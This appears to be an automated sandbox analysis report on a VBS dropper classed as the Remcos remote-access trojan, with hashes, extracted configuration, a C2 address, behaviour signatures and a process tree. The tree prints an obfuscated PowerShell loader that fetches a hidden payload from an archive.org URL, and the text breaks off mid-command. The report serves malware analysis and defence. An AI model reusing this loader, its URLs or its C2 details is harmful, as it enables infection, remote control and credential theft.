Overview

overview

10

Static

static

1

niceworkev...gs.vbs

windows7-x64

10

niceworkev...gs.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-09-2024 09:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    niceworkeverseenonmybrandnewthings.vbs

  • Size

    190KB

  • MD5

    28c97dfde19efa88d6c84a0e7286154b

  • SHA1

    3fe7be956df064cacdbecca32d73c05ca0d700d0

  • SHA256

    639983f2307c5ca4de91dd8128e4b68cc492206eb9cd86064bde0cbd2124e375

  • SHA512

    d0b7db1d451de64143e2b90b1614d628c2aca1e5739c1ff8f0c91a2cf33258d9be7068b08793fae57d84b0e16fbcb23107eea428eebe94037f91b6cf43c10b24

  • SSDEEP

    3072:hb2nhXR7q3BWE12iLRXNEZC+eJxDXXCUgt5pQ9xgGwRzPC86zQRQ6QbQVQbQ0QWO:hbutgrAiLRaI+o2IZKUs3b2V+f4G

Score
10/10
remcosremotehostcollectioncredential_accessdiscoveryexecutionratspywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
exe.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

Extracted

Family

remcos

Botnet

RemoteHost

C2

192.210.150.29:1070

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-X7KD3G

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\niceworkeverseenonmybrandnewthings.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼VQBy⽃ ⇯ ⿉ ⭋ ⌼Gw⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼JwBo⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bw⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼aQBh⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼x⽃ ⇯ ⿉ ⭋ ⌼Dc⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼2⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼dQBz⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼HY⽃ ⇯ ⿉ ⭋ ⌼ZQ⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼cgBn⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼Mg⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼cw⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼ZQB3⽃ ⇯ ⿉ ⭋ ⌼F8⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼F8⽃ ⇯ ⿉ ⭋ ⌼Mg⽃ ⇯ ⿉ ⭋ ⌼w⽃ ⇯ ⿉ ⭋ ⌼DI⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼w⽃ ⇯ ⿉ ⭋ ⌼Dk⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼1⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼bgBl⽃ ⇯ ⿉ ⭋ ⌼Hc⽃ ⇯ ⿉ ⭋ ⌼XwBp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼LgBq⽃ ⇯ ⿉ ⭋ ⌼H⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼B3⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YgBD⽃ ⇯ ⿉ ⭋ ⌼Gw⽃ ⇯ ⿉ ⭋ ⌼aQBl⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼BO⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼dw⽃ ⇯ ⿉ ⭋ ⌼t⽃ ⇯ ⿉ ⭋ ⌼E8⽃ ⇯ ⿉ ⭋ ⌼YgBq⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YwB0⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBO⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Fc⽃ ⇯ ⿉ ⭋ ⌼ZQBi⽃ ⇯ ⿉ ⭋ ⌼EM⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgB0⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼QgB5⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼ZQBz⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼dwBl⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼QwBs⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼LgBE⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼dwBu⽃ ⇯ ⿉ ⭋ ⌼Gw⽃ ⇯ ⿉ ⭋ ⌼bwBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼R⽃ ⇯ ⿉ ⭋ ⌼Bh⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQ⽃ ⇯ ⿉ ⭋ ⌼o⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼FU⽃ ⇯ ⿉ ⭋ ⌼cgBs⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bQBh⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼ZQBU⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBU⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼RQBu⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼bwBk⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bgBn⽃ ⇯ ⿉ ⭋ ⌼F0⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼6⽃ ⇯ ⿉ ⭋ ⌼FU⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼BG⽃ ⇯ ⿉ ⭋ ⌼Dg⽃ ⇯ ⿉ ⭋ ⌼LgBH⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼BT⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼cgBp⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼o⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼EI⽃ ⇯ ⿉ ⭋ ⌼eQB0⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼cw⽃ ⇯ ⿉ ⭋ ⌼p⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Dw⽃ ⇯ ⿉ ⭋ ⌼P⽃ ⇯ ⿉ ⭋ ⌼BC⽃ ⇯ ⿉ ⭋ ⌼EE⽃ ⇯ ⿉ ⭋ ⌼UwBF⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼Bf⽃ ⇯ ⿉ ⭋ ⌼FM⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼BB⽃ ⇯ ⿉ ⭋ ⌼FI⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼+⽃ ⇯ ⿉ ⭋ ⌼D4⽃ ⇯ ⿉ ⭋ ⌼Jw⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Dw⽃ ⇯ ⿉ ⭋ ⌼P⽃ ⇯ ⿉ ⭋ ⌼BC⽃ ⇯ ⿉ ⭋ ⌼EE⽃ ⇯ ⿉ ⭋ ⌼UwBF⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼Bf⽃ ⇯ ⿉ ⭋ ⌼EU⽃ ⇯ ⿉ ⭋ ⌼TgBE⽃ ⇯ ⿉ ⭋ ⌼D4⽃ ⇯ ⿉ ⭋ ⌼Pg⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼FQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼LgBJ⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼TwBm⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼p⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼BJ⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼BP⽃ ⇯ ⿉ ⭋ ⌼GY⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼EY⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bh⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼cwB0⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼cgB0⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼ZwB0⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼Kw⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Ew⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bo⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bi⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼cwBl⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼BM⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBn⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bh⽃ ⇯ ⿉ ⭋ ⌼HI⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼BJ⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼YQBz⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Ng⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼EM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼FM⽃ ⇯ ⿉ ⭋ ⌼dQBi⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼By⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bgBn⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼YQBz⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Ng⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼Ew⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ 